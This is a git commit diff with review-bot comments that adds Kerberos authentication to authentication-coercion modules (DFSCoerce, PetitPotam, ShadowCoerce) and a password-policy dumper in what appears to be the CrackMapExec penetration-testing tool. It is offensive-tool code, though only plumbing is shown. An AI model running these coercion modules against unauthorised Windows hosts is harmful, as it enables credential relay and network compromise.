Fix ccache kerberos auth using rpc
parent
3b5d719d24
commit
5f5884785f
@ -24,7 +24,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
trigger = TriggerAuth()
|
||||
dce = trigger.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host)
|
||||
dce = trigger.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
|
||||
if dce is not None:
|
||||
logging.debug("Target is vulnerable to DFSCoerce")
|
||||
|
@ -78,13 +78,13 @@ class NetrDfsAddRootResponse(NDRCALL):
|
|||
)
|
||||
|
||||
class TriggerAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost):
|
||||
rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\PIPE\netdfs]' % target)
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
|
||||
|
||||
#if doKerberos:
|
||||
# rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
#if target:
|
||||
# rpctransport.setRemoteHost(target)
|
||||
|
||||
|
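Review bot: The new `doKerberos` and `dcHost` parameters on `TriggerAuth.connect` are required positionals, so any caller other than the `on_login` updated in the first hunk now fails with a TypeError; the same holds for `CoerceAuth.connect` in the PetitPotam and ShadowCoerce sections of this commit. Defaults keep the old call shape working: `def connect(self, username, password, domain, lmhash, nthash, target, doKerberos=False, dcHost=None):`. The commented-out `#if doKerberos:` and `#if target:` blocks around the live check are dead code and should be dropped rather than kept next to the real branch. Unlike the other two modules, this hunk only calls `rpctransport.set_kerberos` and does not switch the DCE auth type to `RPC_C_AUTHN_GSS_NEGOTIATE`; the `get_dce_rpc()` part of `connect` lies outside the hunk, so confirm the auth type is handled there, otherwise the transport flag may not be honoured at bind time.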
@ -9,7 +9,7 @@ from impacket import system_errors
|
|||
from impacket.dcerpc.v5 import transport
|
||||
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
|
||||
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
|
||||
class CMEModule:
|
||||
|
@ -35,7 +35,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
plop = CoerceAuth()
|
||||
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host)
|
||||
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
if plop.EfsRpcOpenFileRaw(dce, self.listener):
|
||||
context.log.highlight("VULNERABLE")
|
||||
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
|
||||
|
@ -158,7 +158,7 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
|
|||
)
|
||||
|
||||
class CoerceAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
|
||||
binding_params = {
|
||||
'lsarpc': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
|
||||
|
@ -191,6 +191,11 @@ class CoerceAuth():
|
|||
dce = rpctransport.get_dce_rpc()
|
||||
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||
|
||||
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||
try:
|
||||
dce.connect()
|
||||
|
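Review bot: In the last hunk `dce.set_auth_type(RPC_C_AUTHN_WINNT)` is still called unconditionally and then immediately overwritten inside the new `if doKerberos:` block; moving the WINNT call into an `else:` branch of that `if` makes the two auth paths explicit instead of relying on the override order. The same shape appears in the ShadowCoerce `CoerceAuth.connect` hunk of this commit. Note also that `rpctransport.set_kerberos(...)` runs after `dce = rpctransport.get_dce_rpc()`; whether the DCE object reads the transport's Kerberos flag lazily at bind time or snapshots it on creation is not visible here, so confirm the ordering or set the flag before `get_dce_rpc()`. The surrounding `connect` body starts and ends outside the hunk.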
@ -9,7 +9,7 @@ from impacket.dcerpc.v5.ndr import NDRCALL
|
|||
from impacket.dcerpc.v5.dtypes import BOOL, LONG, WSTR, LPWSTR
|
||||
from impacket.uuid import uuidtup_to_bin
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
|
||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
|
||||
|
||||
class CMEModule:
|
||||
|
||||
|
@ -34,7 +34,7 @@ class CMEModule:
|
|||
|
||||
def on_login(self, context, connection):
|
||||
c = CoerceAuth()
|
||||
dce = c.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe="FssagentRpc")
|
||||
dce = c.connect(username=connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe="FssagentRpc", doKerberos=connection.kerberos, dcHost=connection.kdcHost)
|
||||
|
||||
# If pipe not available, try again. "TL;DR: run the command twice if it doesn't work." - @Shutdown
|
||||
if dce == 1:
|
||||
|
@ -127,7 +127,7 @@ OPNUMS = {
|
|||
}
|
||||
|
||||
class CoerceAuth():
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe):
|
||||
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost):
|
||||
binding_params = {
|
||||
'FssagentRpc': {
|
||||
'stringBinding': r'ncacn_np:%s[\PIPE\FssagentRpc]' % target,
|
||||
|
@ -143,6 +143,11 @@ class CoerceAuth():
|
|||
dce.set_credentials(*rpctransport.get_credentials())
|
||||
dce.set_auth_type(RPC_C_AUTHN_WINNT)
|
||||
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
|
||||
|
||||
if doKerberos:
|
||||
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
|
||||
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
|
||||
|
||||
logging.debug("Connecting to %s" % binding_params[pipe]['stringBinding'])
|
||||
|
||||
try:
|
||||
|
@ -84,7 +84,7 @@ class PassPolDump:
|
|||
self.lmhash = ''
|
||||
self.nthash = ''
|
||||
self.aesKey = None
|
||||
self.doKerberos = False
|
||||
self.doKerberos = connection.kerberos
|
||||
self.protocols = PassPolDump.KNOWN_PROTOCOLS.keys()
|
||||
self.pass_pol = {}
|
||||
|
||||
|
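Review bot: `self.doKerberos` now follows the connection flag, but the adjacent `self.aesKey = None` stays hard-coded and, unlike the three coercion modules in this commit, nothing here takes `connection.kdcHost`; the rest of `PassPolDump.__init__` and the code that consumes these attributes lie outside the hunk, so confirm a KDC host is supplied before the Kerberos path is used. A one-line comment would make the intent clear to the next reader: `# doKerberos mirrors the CME connection flag; aesKey/kdcHost are not taken from it here -- confirm the ccache path does not need them`.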